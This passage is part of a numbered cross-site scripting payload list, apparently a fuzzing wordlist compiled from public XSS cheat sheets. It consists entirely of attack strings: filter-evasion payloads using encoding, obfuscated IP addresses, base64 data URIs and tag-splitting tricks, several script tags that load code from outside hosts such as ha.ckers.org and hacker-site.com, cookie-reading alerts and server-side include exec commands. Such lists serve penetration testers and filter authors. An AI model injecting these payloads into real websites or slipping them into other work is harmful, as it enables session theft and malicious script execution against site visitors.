  752. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  753. <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
  754. <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
  755. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  756. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  757. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  758. Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
  759. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  760. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  761. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  762. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  763. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  764. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  765. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  766. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  767. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  768. <A HREF="http://66.102.7.147/">XSS</A>
  769. <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
  770. <A HREF="http://1113982867/">XSS</A>
  771. <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
  772. <A HREF="http://0102.0146.0007.00000223/">XSS</A>
  773. <A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
  774. <iframe src="&Tab;javascript:prompt(1)&Tab;">
  775. <svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
  776. <input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
  777. <sVg><scRipt >alert&lpar;1&rpar; {Opera}
  778. <img/src=`` onerror=this.onerror=confirm(1)
  779. <form><isindex formaction="javascript&colon;confirm(1)"
  780. <img src=``&NewLine; onerror=alert(1)&NewLine;
  781. <script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
  782. <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
  783. <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
  784. <script /**/>/**/alert(1)/**/</script /**/
  785. &#34;&#62;<h1/onmouseover='\u0061lert(1)'>
  786. <iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
  787. <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
  788. <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
  789. <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
  790. <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
  791. <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
  792. <form><a href="javascript:\u0061lert&#x28;1&#x29;">X
  793. </script><img/*/src="worksinchrome&colon;prompt&#x28;1&#x29;"/*/onerror='eval(src)'>
  794. <img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
  795. <form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
  796. <a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
  797. http://www.google<script .com>alert(document.location)</script
  798. <a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
  799. <img/src=@&#32;&#13; onerror = prompt('&#49;')
  800. <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
  801. <script ^__^>alert(String.fromCharCode(49))</script ^__^
  802. </style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
  803. &#00;</form><input type&#61;"date" onfocus="alert(1)">
  804. <form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
  805. <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
  806. <iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
  807. <a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  808. <script ~~~>alert(0%0)</script ~~~>
  809. <style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
  810. <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
  811. <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
  812. &#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
  813. &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
  814. <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
  815. <div/style="width:expression(confirm(1))">X</div> {IE7}
  816. <iframe// src=javaSCRIPT&colon;alert(1)
  817. //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
  818. /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
  819. //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
  820. </font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
  821. <a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
  822. </plaintext\></|\><plaintext/onmouseover=prompt(1)
  823. </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
  824. <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
  825. <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
  826. <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
  827. <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
  828. <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  829. <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
  830. <var onmouseover="prompt(1)">On Mouse Over</var>
  831. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  832. <img src="/" =_=" title="onerror='prompt(1)'">
  833. <%<!--'%><script>alert(1);</script -->
  834. <script src="data:text/javascript,alert(1)"></script>
  835. <iframe/src \/\/onload = prompt(1)
  836. <iframe/onreadystatechange=alert(1)
  837. <svg/onload=alert(1)
  838. <input value=<><iframe/src=javascript:confirm(1)
  839. <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
  840. <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
  841. <img src=`xx:xx`onerror=alert(1)>
  842. <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
  843. <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
  844. <math><a xlink:href="//jsfiddle.net/t846h/">click
  845. <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
  846. <svg contentScriptType=text/vbs><script>MsgBox+1
  847. <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
  848. <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
  849. <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
  850. <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
  851. <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
  852. <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
  853. <script>+-+-1-+-+alert(1)</script>
  854. <body/onload=&lt;!--&gt;&#10alert(1)>
  855. <script itworksinallbrowsers>/*<script* */alert(1)</script
  856. <img src ?itworksonchrome?\/onerror = alert(1)
  857. <svg><script>//&NewLine;confirm(1);</script </svg>
  858. <svg><script onlypossibleinopera:-)> alert(1)
  859. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
  860. <script x> alert(1) </script 1=2
  861. <div/onmouseover='alert(1)'> style="x:">
  862. <--`<img/src=` onerror=alert(1)> --!>
  863. <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
  864. <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
  865. "><img src=x onerror=window.open('https://www.google.com/');>
  866. <form><button formaction=javascript&colon;alert(1)>CLICKME
  867. <math><a xlink:href="//jsfiddle.net/t846h/">click
  868. <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
  869. <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
  870. <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  871. '';!--"<XSS>=&{()}
  872. '>//\\,<'>">">"*"
  873. '); alert('XSS
  874. <script>alert(1);</script>
  875. <script>alert('XSS');</script>
  876. <IMG SRC="javascript:alert('XSS');">
  877. <IMG SRC=javascript:alert('XSS')>
  878. <IMG SRC=javascript:alert('XSS')>
  879. <IMG SRC=javascript:alert(&quot;XSS&quot;)>
  880. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  881. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  882. <script>alert(String.fromCharCode(88,83,83))</script>
  883. <img src=foo.png onerror=alert(/xssed/) />
  884. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  885. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  886. <marquee><script>alert('XSS')</script></marquee>
  887. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  888. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  889. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  890. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  891. "><script>alert(0)</script>
  892. <script src=http://yoursite.com/your_files.js></script>
  893. </title><script>alert(/xss/)</script>
  894. </textarea><script>alert(/xss/)</script>
  895. <IMG LOWSRC=\"javascript:alert('XSS')\">
  896. <IMG DYNSRC=\"javascript:alert('XSS')\">
  897. <font style='color:expression(alert(document.cookie))'>
  898. <img src="javascript:alert('XSS')">
  899. <script language="JavaScript">alert('XSS')</script>
  900. <body onunload="javascript:alert('XSS');">
  901. <body onLoad="alert('XSS');"
  902. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  903. "/></a></><img src=1.gif onerror=alert(1)>
  904. window.alert("Bonjour !");
  905. <div style="x:expression((window.r==1)?'':eval('r=1;
  906. alert(String.fromCharCode(88,83,83));'))">
  907. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  908. "><script alert(String.fromCharCode(88,83,83))</script>
  909. '>><marquee><h1>XSS</h1></marquee>
  910. '">><script>alert('XSS')</script>
  911. '">><marquee><h1>XSS</h1></marquee>
  912. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  913. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  914. <script>var var = 1; alert(var)</script>
  915. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  916. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  917. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  918. " onfocus=alert(document.domain) "> <"
  919. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  920. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  921. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  922. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  923. <br size=\"&{alert('XSS')}\">
  924. <scrscriptipt>alert(1)</scrscriptipt>
  925. </br style=a:expression(alert())>
  926. </script><script>alert(1)</script>
  927. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  928. [color=red width=expression(alert(123))][color]
  929. <BASE HREF="javascript:alert('XSS');//">
  930. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  931. "></iframe><script>alert(123)</script>
  932. <body onLoad="while(true) alert('XSS');">
  933. '"></title><script>alert(1111)</script>
  934. </textarea>'"><script>alert(document.cookie)</script>
  935. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  936. </script></script><<<<script><>>>><<<script>alert(123)</script>
  937. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  938. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  939. '></select><script>alert(123)</script>
  940. '>"><script src = 'http://www.site.com/XSS.js'></script>
  941. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  942. <SCRIPT>document.write("XSS");</SCRIPT>
  943. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  944. ='><script>alert("xss")</script>
  945. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  946. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  947. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  948. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  949. src="http://www.site.com/XSS.js"></script>
  950. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
  951. !--" /><script>alert('xss');</script>
  952. <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  953. "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  954. '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
  955. <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
  956. <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
  957. "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
  958. '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
  959. <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
  960. '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
  961. "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
  962. \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
  963. http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
  964. http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
  965. '); alert('xss'); var x='
  966. \\'); alert(\'xss\');var x=\'
  967. //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
  968. >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
  969. <img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
  970. </body>
  971. </html>
  972. <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
  973. <SCRIPT> alert(“XSS”); </SCRIPT>
  974. <BODY ONLOAD=alert("XSS")>
  975. <BODY BACKGROUND="javascript:alert('XSS')">
  976. <IMG SRC="javascript:alert('XSS');">
  977. <IMG DYNSRC="javascript:alert('XSS')">
  978. <IMG LOWSRC="javascript:alert('XSS')">
  979. <IFRAME SRC=”http://hacker-site.com/xss.html”>
  980. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  981. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  982. <TABLE BACKGROUND="javascript:alert('XSS')">
  983. <TD BACKGROUND="javascript:alert('XSS')">
  984. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  985. <DIV STYLE="width: expression(alert('XSS'));">
  986. <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
  987. <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
  988. &apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  989. &apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
  990. &lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
  991. &lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
  992. &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
  993. &lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
  994. &lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  995. &lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  996. &lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
  997. &lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
  998. &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
  999. &lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
  1000. &lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
  1001. &lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
  1002. &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1003. &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1004. &lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
  1005. &lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1006. &lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1007. &lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
  1008. Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
  1009. exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
  1010. &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
  1011. &lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
  1012. &lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
  1013. &lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
  1014. %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
  1015. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1016. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
  1017. &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1018. &lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
  1019. &lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
  1020. &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
  1021. &lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
  1022. a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
  1023. &lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
  1024. &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;
  1025. &lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
  1026. &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
  1027. &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
  1028. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
  1029. &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
  1030. &lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
  1031. &lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
  1032. &lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
  1033. &lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
  1034. &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
  1035. &lt;HTML xmlns:xss&gt;
  1036. &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
  1037. &lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
  1038. &lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
  1039. &lt;HTML&gt;&lt;BODY&gt;
  1040. &lt;!--[if gte IE 4]&gt;
  1041. &lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
  1042. &lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
  1043. &lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
  1044. &lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
  1045. &lt;? echo(&apos;&lt;SCR)&apos;;
  1046. &lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
  1047. &lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;
  1048. &lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
